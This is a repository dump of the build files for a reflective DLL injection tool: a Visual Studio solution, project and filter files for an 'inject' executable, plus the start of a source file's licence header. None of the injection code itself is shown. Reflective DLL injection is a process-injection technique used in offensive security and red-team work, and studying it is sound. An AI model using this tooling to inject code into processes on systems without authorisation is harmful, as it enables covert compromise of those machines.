https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/inject/Release/inject.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/Release/inject.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/ReflectiveDLLInjection-Notes/5f093d120020d0f7fdad1ae3fd0d06dd9a1bb853/ReflectiveDLLInjection-master/inject/Release/inject.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/inject.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 10.00
 3 | # Visual C++ Express 2008
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject.vcproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Win32 = Debug|Win32
 9 | 		Release|Win32 = Release|Win32
10 | 	EndGlobalSection
11 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32
13 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32
14 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32
15 | 		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32
16 | 	EndGlobalSection
17 | 	GlobalSection(SolutionProperties) = preSolution
18 | 		HideSolutionNode = FALSE
19 | 	EndGlobalSection
20 | EndGlobal
21 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/inject.vcproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="Windows-1252"?>
  2 | <VisualStudioProject
  3 | 	ProjectType="Visual C++"
  4 | 	Version="9.00"
  5 | 	Name="inject"
  6 | 	ProjectGUID="{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
  7 | 	RootNamespace="inject"
  8 | 	Keyword="Win32Proj"
  9 | 	TargetFrameworkVersion="196613"
 10 | 	>
 11 | 	<Platforms>
 12 | 		<Platform
 13 | 			Name="Win32"
 14 | 		/>
 15 | 		<Platform
 16 | 			Name="x64"
 17 | 		/>
 18 | 	</Platforms>
 19 | 	<ToolFiles>
 20 | 	</ToolFiles>
 21 | 	<Configurations>
 22 | 		<Configuration
 23 | 			Name="Debug|Win32"
 24 | 			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
 25 | 			IntermediateDirectory="$(ConfigurationName)"
 26 | 			ConfigurationType="1"
 27 | 			CharacterSet="1"
 28 | 			>
 29 | 			<Tool
 30 | 				Name="VCPreBuildEventTool"
 31 | 			/>
 32 | 			<Tool
 33 | 				Name="VCCustomBuildTool"
 34 | 			/>
 35 | 			<Tool
 36 | 				Name="VCXMLDataGeneratorTool"
 37 | 			/>
 38 | 			<Tool
 39 | 				Name="VCWebServiceProxyGeneratorTool"
 40 | 			/>
 41 | 			<Tool
 42 | 				Name="VCMIDLTool"
 43 | 			/>
 44 | 			<Tool
 45 | 				Name="VCCLCompilerTool"
 46 | 				Optimization="0"
 47 | 				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
 48 | 				MinimalRebuild="true"
 49 | 				BasicRuntimeChecks="3"
 50 | 				RuntimeLibrary="3"
 51 | 				UsePrecompiledHeader="0"
 52 | 				WarningLevel="3"
 53 | 				DebugInformationFormat="4"
 54 | 			/>
 55 | 			<Tool
 56 | 				Name="VCManagedResourceCompilerTool"
 57 | 			/>
 58 | 			<Tool
 59 | 				Name="VCResourceCompilerTool"
 60 | 			/>
 61 | 			<Tool
 62 | 				Name="VCPreLinkEventTool"
 63 | 			/>
 64 | 			<Tool
 65 | 				Name="VCLinkerTool"
 66 | 				LinkIncremental="2"
 67 | 				GenerateDebugInformation="true"
 68 | 				SubSystem="1"
 69 | 				TargetMachine="1"
 70 | 			/>
 71 | 			<Tool
 72 | 				Name="VCALinkTool"
 73 | 			/>
 74 | 			<Tool
 75 | 				Name="VCManifestTool"
 76 | 			/>
 77 | 			<Tool
 78 | 				Name="VCXDCMakeTool"
 79 | 			/>
 80 | 			<Tool
 81 | 				Name="VCBscMakeTool"
 82 | 			/>
 83 | 			<Tool
 84 | 				Name="VCFxCopTool"
 85 | 			/>
 86 | 			<Tool
 87 | 				Name="VCAppVerifierTool"
 88 | 			/>
 89 | 			<Tool
 90 | 				Name="VCPostBuildEventTool"
 91 | 			/>
 92 | 		</Configuration>
 93 | 		<Configuration
 94 | 			Name="Debug|x64"
 95 | 			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
 96 | 			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
 97 | 			ConfigurationType="1"
 98 | 			CharacterSet="1"
 99 | 			>
100 | 			<Tool
101 | 				Name="VCPreBuildEventTool"
102 | 			/>
103 | 			<Tool
104 | 				Name="VCCustomBuildTool"
105 | 			/>
106 | 			<Tool
107 | 				Name="VCXMLDataGeneratorTool"
108 | 			/>
109 | 			<Tool
110 | 				Name="VCWebServiceProxyGeneratorTool"
111 | 			/>
112 | 			<Tool
113 | 				Name="VCMIDLTool"
114 | 				TargetEnvironment="3"
115 | 			/>
116 | 			<Tool
117 | 				Name="VCCLCompilerTool"
118 | 				Optimization="0"
119 | 				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
120 | 				MinimalRebuild="true"
121 | 				BasicRuntimeChecks="3"
122 | 				RuntimeLibrary="3"
123 | 				UsePrecompiledHeader="0"
124 | 				WarningLevel="3"
125 | 				DebugInformationFormat="3"
126 | 			/>
127 | 			<Tool
128 | 				Name="VCManagedResourceCompilerTool"
129 | 			/>
130 | 			<Tool
131 | 				Name="VCResourceCompilerTool"
132 | 			/>
133 | 			<Tool
134 | 				Name="VCPreLinkEventTool"
135 | 			/>
136 | 			<Tool
137 | 				Name="VCLinkerTool"
138 | 				LinkIncremental="2"
139 | 				GenerateDebugInformation="true"
140 | 				SubSystem="1"
141 | 				TargetMachine="17"
142 | 			/>
143 | 			<Tool
144 | 				Name="VCALinkTool"
145 | 			/>
146 | 			<Tool
147 | 				Name="VCManifestTool"
148 | 			/>
149 | 			<Tool
150 | 				Name="VCXDCMakeTool"
151 | 			/>
152 | 			<Tool
153 | 				Name="VCBscMakeTool"
154 | 			/>
155 | 			<Tool
156 | 				Name="VCFxCopTool"
157 | 			/>
158 | 			<Tool
159 | 				Name="VCAppVerifierTool"
160 | 			/>
161 | 			<Tool
162 | 				Name="VCPostBuildEventTool"
163 | 			/>
164 | 		</Configuration>
165 | 		<Configuration
166 | 			Name="Release|Win32"
167 | 			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
168 | 			IntermediateDirectory="$(ConfigurationName)"
169 | 			ConfigurationType="1"
170 | 			CharacterSet="2"
171 | 			WholeProgramOptimization="1"
172 | 			>
173 | 			<Tool
174 | 				Name="VCPreBuildEventTool"
175 | 			/>
176 | 			<Tool
177 | 				Name="VCCustomBuildTool"
178 | 			/>
179 | 			<Tool
180 | 				Name="VCXMLDataGeneratorTool"
181 | 			/>
182 | 			<Tool
183 | 				Name="VCWebServiceProxyGeneratorTool"
184 | 			/>
185 | 			<Tool
186 | 				Name="VCMIDLTool"
187 | 			/>
188 | 			<Tool
189 | 				Name="VCCLCompilerTool"
190 | 				Optimization="2"
191 | 				EnableIntrinsicFunctions="true"
192 | 				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
193 | 				RuntimeLibrary="0"
194 | 				EnableFunctionLevelLinking="true"
195 | 				UsePrecompiledHeader="0"
196 | 				WarningLevel="3"
197 | 				DebugInformationFormat="3"
198 | 			/>
199 | 			<Tool
200 | 				Name="VCManagedResourceCompilerTool"
201 | 			/>
202 | 			<Tool
203 | 				Name="VCResourceCompilerTool"
204 | 			/>
205 | 			<Tool
206 | 				Name="VCPreLinkEventTool"
207 | 			/>
208 | 			<Tool
209 | 				Name="VCLinkerTool"
210 | 				LinkIncremental="1"
211 | 				GenerateDebugInformation="true"
212 | 				SubSystem="1"
213 | 				OptimizeReferences="2"
214 | 				EnableCOMDATFolding="2"
215 | 				TargetMachine="1"
216 | 			/>
217 | 			<Tool
218 | 				Name="VCALinkTool"
219 | 			/>
220 | 			<Tool
221 | 				Name="VCManifestTool"
222 | 			/>
223 | 			<Tool
224 | 				Name="VCXDCMakeTool"
225 | 			/>
226 | 			<Tool
227 | 				Name="VCBscMakeTool"
228 | 			/>
229 | 			<Tool
230 | 				Name="VCFxCopTool"
231 | 			/>
232 | 			<Tool
233 | 				Name="VCAppVerifierTool"
234 | 			/>
235 | 			<Tool
236 | 				Name="VCPostBuildEventTool"
237 | 				CommandLine="copy ..\Release\inject.exe ..\bin\"
238 | 			/>
239 | 		</Configuration>
240 | 		<Configuration
241 | 			Name="Release|x64"
242 | 			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
243 | 			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
244 | 			ConfigurationType="1"
245 | 			CharacterSet="2"
246 | 			WholeProgramOptimization="1"
247 | 			>
248 | 			<Tool
249 | 				Name="VCPreBuildEventTool"
250 | 			/>
251 | 			<Tool
252 | 				Name="VCCustomBuildTool"
253 | 			/>
254 | 			<Tool
255 | 				Name="VCXMLDataGeneratorTool"
256 | 			/>
257 | 			<Tool
258 | 				Name="VCWebServiceProxyGeneratorTool"
259 | 			/>
260 | 			<Tool
261 | 				Name="VCMIDLTool"
262 | 				TargetEnvironment="3"
263 | 			/>
264 | 			<Tool
265 | 				Name="VCCLCompilerTool"
266 | 				Optimization="2"
267 | 				EnableIntrinsicFunctions="true"
268 | 				PreprocessorDefinitions="WIN64;NDEBUG;_CONSOLE;_WIN64"
269 | 				RuntimeLibrary="0"
270 | 				EnableFunctionLevelLinking="true"
271 | 				UsePrecompiledHeader="0"
272 | 				WarningLevel="3"
273 | 				DebugInformationFormat="3"
274 | 			/>
275 | 			<Tool
276 | 				Name="VCManagedResourceCompilerTool"
277 | 			/>
278 | 			<Tool
279 | 				Name="VCResourceCompilerTool"
280 | 			/>
281 | 			<Tool
282 | 				Name="VCPreLinkEventTool"
283 | 			/>
284 | 			<Tool
285 | 				Name="VCLinkerTool"
286 | 				OutputFile="$(OutDir)\inject.x64.exe"
287 | 				LinkIncremental="1"
288 | 				GenerateDebugInformation="true"
289 | 				SubSystem="1"
290 | 				OptimizeReferences="2"
291 | 				EnableCOMDATFolding="2"
292 | 				TargetMachine="17"
293 | 			/>
294 | 			<Tool
295 | 				Name="VCALinkTool"
296 | 			/>
297 | 			<Tool
298 | 				Name="VCManifestTool"
299 | 			/>
300 | 			<Tool
301 | 				Name="VCXDCMakeTool"
302 | 			/>
303 | 			<Tool
304 | 				Name="VCBscMakeTool"
305 | 			/>
306 | 			<Tool
307 | 				Name="VCFxCopTool"
308 | 			/>
309 | 			<Tool
310 | 				Name="VCAppVerifierTool"
311 | 			/>
312 | 			<Tool
313 | 				Name="VCPostBuildEventTool"
314 | 				CommandLine="copy ..\x64\Release\inject.x64.exe ..\bin\"
315 | 			/>
316 | 		</Configuration>
317 | 	</Configurations>
318 | 	<References>
319 | 	</References>
320 | 	<Files>
321 | 		<Filter
322 | 			Name="Source Files"
323 | 			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
324 | 			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
325 | 			>
326 | 			<File
327 | 				RelativePath=".\src\GetProcAddressR.c"
328 | 				>
329 | 			</File>
330 | 			<File
331 | 				RelativePath=".\src\Inject.c"
332 | 				>
333 | 			</File>
334 | 			<File
335 | 				RelativePath=".\src\LoadLibraryR.c"
336 | 				>
337 | 			</File>
338 | 		</Filter>
339 | 		<Filter
340 | 			Name="Header Files"
341 | 			Filter="h;hpp;hxx;hm;inl;inc;xsd"
342 | 			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
343 | 			>
344 | 			<File
345 | 				RelativePath=".\src\GetProcAddressR.h"
346 | 				>
347 | 			</File>
348 | 			<File
349 | 				RelativePath=".\src\LoadLibraryR.h"
350 | 				>
351 | 			</File>
352 | 			<File
353 | 				RelativePath=".\src\ReflectiveDLLInjection.h"
354 | 				>
355 | 			</File>
356 | 		</Filter>
357 | 	</Files>
358 | 	<Globals>
359 | 	</Globals>
360 | </VisualStudioProject>
361 | 


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/inject.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|ARM">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>ARM</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Debug|Win32">
  9 |       <Configuration>Debug</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|ARM">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>ARM</Platform>
 19 |     </ProjectConfiguration>
 20 |     <ProjectConfiguration Include="Release|Win32">
 21 |       <Configuration>Release</Configuration>
 22 |       <Platform>Win32</Platform>
 23 |     </ProjectConfiguration>
 24 |     <ProjectConfiguration Include="Release|x64">
 25 |       <Configuration>Release</Configuration>
 26 |       <Platform>x64</Platform>
 27 |     </ProjectConfiguration>
 28 |   </ItemGroup>
 29 |   <PropertyGroup Label="Globals">
 30 |     <ProjectGuid>{EEF3FD41-05D8-4A07-8434-EF5D34D76335}</ProjectGuid>
 31 |     <RootNamespace>inject</RootNamespace>
 32 |     <Keyword>Win32Proj</Keyword>
 33 |   </PropertyGroup>
 34 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <PlatformToolset>v142</PlatformToolset>
 38 |     <CharacterSet>MultiByte</CharacterSet>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <UseOfMfc>Static</UseOfMfc>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <PlatformToolset>v142</PlatformToolset>
 45 |     <CharacterSet>MultiByte</CharacterSet>
 46 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <PlatformToolset>v142</PlatformToolset>
 51 |     <CharacterSet>Unicode</CharacterSet>
 52 |   </PropertyGroup>
 53 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
 54 |     <ConfigurationType>Application</ConfigurationType>
 55 |     <PlatformToolset>v142</PlatformToolset>
 56 |     <CharacterSet>Unicode</CharacterSet>
 57 |   </PropertyGroup>
 58 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 59 |     <ConfigurationType>Application</ConfigurationType>
 60 |     <PlatformToolset>v142</PlatformToolset>
 61 |     <CharacterSet>MultiByte</CharacterSet>
 62 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 63 |     <UseOfMfc>Static</UseOfMfc>
 64 |   </PropertyGroup>
 65 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 66 |     <ConfigurationType>Application</ConfigurationType>
 67 |     <PlatformToolset>v142</PlatformToolset>
 68 |     <CharacterSet>Unicode</CharacterSet>
 69 |   </PropertyGroup>
 70 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 71 |   <ImportGroup Label="ExtensionSettings">
 72 |   </ImportGroup>
 73 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
 74 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 75 |   </ImportGroup>
 76 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
 77 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 78 |   </ImportGroup>
 79 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
 80 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 81 |   </ImportGroup>
 82 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
 83 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 84 |   </ImportGroup>
 85 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
 86 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 87 |   </ImportGroup>
 88 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
 89 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 90 |   </ImportGroup>
 91 |   <PropertyGroup Label="UserMacros" />
 92 |   <PropertyGroup>
 93 |     <_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
 94 |   </PropertyGroup>
 95 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 96 |     <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
 97 |     <IntDir>$(Configuration)\</IntDir>
 98 |     <LinkIncremental>true</LinkIncremental>
 99 |   </PropertyGroup>
100 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
101 |     <LinkIncremental>true</LinkIncremental>
102 |   </PropertyGroup>
103 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
104 |     <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
105 |     <IntDir>$(Platform)\$(Configuration)\</IntDir>
106 |     <LinkIncremental>true</LinkIncremental>
107 |   </PropertyGroup>
108 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
109 |     <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
110 |     <IntDir>$(Configuration)\</IntDir>
111 |     <LinkIncremental>false</LinkIncremental>
112 |   </PropertyGroup>
113 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
114 |     <LinkIncremental>false</LinkIncremental>
115 |   </PropertyGroup>
116 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
117 |     <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
118 |     <IntDir>$(Platform)\$(Configuration)\</IntDir>
119 |     <LinkIncremental>false</LinkIncremental>
120 |   </PropertyGroup>
121 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
122 |     <ClCompile>
123 |       <Optimization>Disabled</Optimization>
124 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
125 |       <MinimalRebuild>true</MinimalRebuild>
126 |       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
127 |       <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
128 |       <PrecompiledHeader />
129 |       <WarningLevel>Level3</WarningLevel>
130 |       <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
131 |     </ClCompile>
132 |     <Link>
133 |       <GenerateDebugInformation>true</GenerateDebugInformation>
134 |       <SubSystem>Console</SubSystem>
135 |       <TargetMachine>MachineX86</TargetMachine>
136 |     </Link>
137 |   </ItemDefinitionGroup>
138 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
139 |     <ClCompile>
140 |       <Optimization>Disabled</Optimization>
141 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
142 |       <MinimalRebuild>true</MinimalRebuild>
143 |       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
144 |       <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
145 |       <PrecompiledHeader>
146 |       </PrecompiledHeader>
147 |       <WarningLevel>Level3</WarningLevel>
148 |       <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
149 |     </ClCompile>
150 |     <Link>
151 |       <GenerateDebugInformation>true</GenerateDebugInformation>
152 |       <SubSystem>Console</SubSystem>
153 |     </Link>
154 |   </ItemDefinitionGroup>
155 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
156 |     <Midl>
157 |       <TargetEnvironment>X64</TargetEnvironment>
158 |     </Midl>
159 |     <ClCompile>
160 |       <Optimization>Disabled</Optimization>
161 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
162 |       <MinimalRebuild>true</MinimalRebuild>
163 |       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
164 |       <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
165 |       <PrecompiledHeader />
166 |       <WarningLevel>Level3</WarningLevel>
167 |       <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
168 |     </ClCompile>
169 |     <Link>
170 |       <GenerateDebugInformation>true</GenerateDebugInformation>
171 |       <SubSystem>Console</SubSystem>
172 |       <TargetMachine>MachineX64</TargetMachine>
173 |     </Link>
174 |   </ItemDefinitionGroup>
175 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
176 |     <ClCompile>
177 |       <Optimization>MaxSpeed</Optimization>
178 |       <IntrinsicFunctions>true</IntrinsicFunctions>
179 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;WIN_X86;%(PreprocessorDefinitions)</PreprocessorDefinitions>
180 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
181 |       <FunctionLevelLinking>true</FunctionLevelLinking>
182 |       <PrecompiledHeader />
183 |       <WarningLevel>Level3</WarningLevel>
184 |       <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
185 |     </ClCompile>
186 |     <Link>
187 |       <GenerateDebugInformation>true</GenerateDebugInformation>
188 |       <SubSystem>Console</SubSystem>
189 |       <OptimizeReferences>true</OptimizeReferences>
190 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
191 |       <TargetMachine>MachineX86</TargetMachine>
192 |     </Link>
193 |     <PostBuildEvent>
194 |       <Command>
195 |       </Command>
196 |     </PostBuildEvent>
197 |   </ItemDefinitionGroup>
198 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
199 |     <ClCompile>
200 |       <Optimization>MaxSpeed</Optimization>
201 |       <IntrinsicFunctions>true</IntrinsicFunctions>
202 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;WIN_ARM;%(PreprocessorDefinitions)</PreprocessorDefinitions>
203 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
204 |       <FunctionLevelLinking>true</FunctionLevelLinking>
205 |       <PrecompiledHeader>
206 |       </PrecompiledHeader>
207 |       <WarningLevel>Level3</WarningLevel>
208 |       <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
209 |     </ClCompile>
210 |     <Link>
211 |       <GenerateDebugInformation>true</GenerateDebugInformation>
212 |       <SubSystem>Console</SubSystem>
213 |       <OptimizeReferences>true</OptimizeReferences>
214 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
215 |       <OutputFile>$(OutDir)inject.arm.exe</OutputFile>
216 |       <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
217 |     </Link>
218 |     <PostBuildEvent>
219 |       <Command>copy ..\ARM\Release\inject.arm.exe ..\bin\</Command>
220 |     </PostBuildEvent>
221 |   </ItemDefinitionGroup>
222 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
223 |     <Midl>
224 |       <TargetEnvironment>X64</TargetEnvironment>
225 |     </Midl>
226 |     <ClCompile>
227 |       <Optimization>MaxSpeed</Optimization>
228 |       <IntrinsicFunctions>true</IntrinsicFunctions>
229 |       <PreprocessorDefinitions>WIN64;NDEBUG;_CONSOLE;_WIN64;WIN_X64;%(PreprocessorDefinitions)</PreprocessorDefinitions>
230 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
231 |       <FunctionLevelLinking>true</FunctionLevelLinking>
232 |       <PrecompiledHeader />
233 |       <WarningLevel>Level3</WarningLevel>
234 |       <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
235 |     </ClCompile>
236 |     <Link>
237 |       <OutputFile>$(OutDir)inject.x64.exe</OutputFile>
238 |       <GenerateDebugInformation>true</GenerateDebugInformation>
239 |       <SubSystem>Console</SubSystem>
240 |       <OptimizeReferences>true</OptimizeReferences>
241 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
242 |       <TargetMachine>MachineX64</TargetMachine>
243 |     </Link>
244 |     <PostBuildEvent>
245 |       <Command>copy ..\x64\Release\inject.x64.exe ..\bin\</Command>
246 |     </PostBuildEvent>
247 |   </ItemDefinitionGroup>
248 |   <ItemGroup>
249 |     <ClCompile Include="src\GetProcAddressR.c" />
250 |     <ClCompile Include="src\Inject.c" />
251 |     <ClCompile Include="src\LoadLibraryR.c" />
252 |   </ItemGroup>
253 |   <ItemGroup>
254 |     <ClInclude Include="src\GetProcAddressR.h" />
255 |     <ClInclude Include="src\LoadLibraryR.h" />
256 |     <ClInclude Include="src\ReflectiveDLLInjection.h" />
257 |   </ItemGroup>
258 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
259 |   <ImportGroup Label="ExtensionTargets">
260 |   </ImportGroup>
261 | </Project>


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/inject.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |   </ItemGroup>
13 |   <ItemGroup>
14 |     <ClCompile Include="src\GetProcAddressR.c">
15 |       <Filter>Source Files</Filter>
16 |     </ClCompile>
17 |     <ClCompile Include="src\Inject.c">
18 |       <Filter>Source Files</Filter>
19 |     </ClCompile>
20 |     <ClCompile Include="src\LoadLibraryR.c">
21 |       <Filter>Source Files</Filter>
22 |     </ClCompile>
23 |   </ItemGroup>
24 |   <ItemGroup>
25 |     <ClInclude Include="src\GetProcAddressR.h">
26 |       <Filter>Header Files</Filter>
27 |     </ClInclude>
28 |     <ClInclude Include="src\LoadLibraryR.h">
29 |       <Filter>Header Files</Filter>
30 |     </ClInclude>
31 |     <ClInclude Include="src\ReflectiveDLLInjection.h">
32 |       <Filter>Header Files</Filter>
33 |     </ClInclude>
34 |   </ItemGroup>
35 | </Project>


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/inject.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/ReflectiveDLLInjection-master/inject/src/GetProcAddressR.c:
--------------------------------------------------------------------------------
  1 | //===============================================================================================//
  2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
  3 | // All rights reserved.
  4 | // 
  5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 
  6 | // provided that the following conditions are met:
  7 | // 
  8 | //     * Redistributions of source code must retain the above copyright notice, this list of 
  9 | // conditions and the following disclaimer.
 10 | // 
